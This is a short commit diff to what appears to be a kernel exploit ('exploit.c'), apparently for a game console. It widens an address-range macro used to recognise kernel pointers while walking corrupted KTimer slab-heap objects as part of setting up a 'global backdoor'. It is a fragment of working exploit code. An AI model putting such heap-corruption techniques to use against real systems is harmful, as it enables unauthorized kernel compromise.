relax in use constraint check

nedwill · Jan 5, 2017 · 1e169ed · 1e169ed
1 parent 7bc45c5
commit 1e169ed
Showing 1 changed file with 7 additions and 3 deletions.
diff --git a/source/exploit.c b/source/exploit.c
@@ -114,8 +114,12 @@ static bool try_setup_global_backdoor() {
  return true;
 }
 
-/* TODO upper bound is 11.1+ only */
-#define IS_VTABLE(addr) (0xFFF2E000 <= (u32)(addr) && (u32)(addr) < 0xFFF2F000)
+/* This should really be IS_VTABLE but different mappings make it hard
+ * to generalize this value. The only base pointers in the slab heap
+ * are pointers to the vtable, pointers to kernel objects, and NULL,
+ * so this overapproximation is worth the precision tradeoff.
+ */
+#define IS_KERNEL_NON_SLAB_HEAP(addr) (0xFFF00000 <= (u32)(addr) && (u32)(addr) < 0xFFF70000)
 #define TOBJ_ADDR_TO_IDX(base, addr) (((u32)(addr) - (u32)(base)) / KTIMER_OBJECT_SIZE)
 #define TOBJ_IDX_TO_ADDR(base, idx) ((u32)(base) + KTIMER_OBJECT_SIZE * (u32)(idx))
 
@@ -150,7 +154,7 @@ static bool find_broken_link(void ***parent_ret, void **child_ret) {
  wait_for_user();
  }
  printf("%ld -> 0x%lx (0x%lx)\n", TOBJ_ADDR_TO_IDX(ktimer_base, parent), (u32)child, TOBJ_ADDR_TO_IDX(ktimer_base, child));
- if (IS_VTABLE(child)) {
+ if (IS_KERNEL_NON_SLAB_HEAP(child)) {
  /* for allocated objects, use non-null filler values since
  * our checks just look for null
  */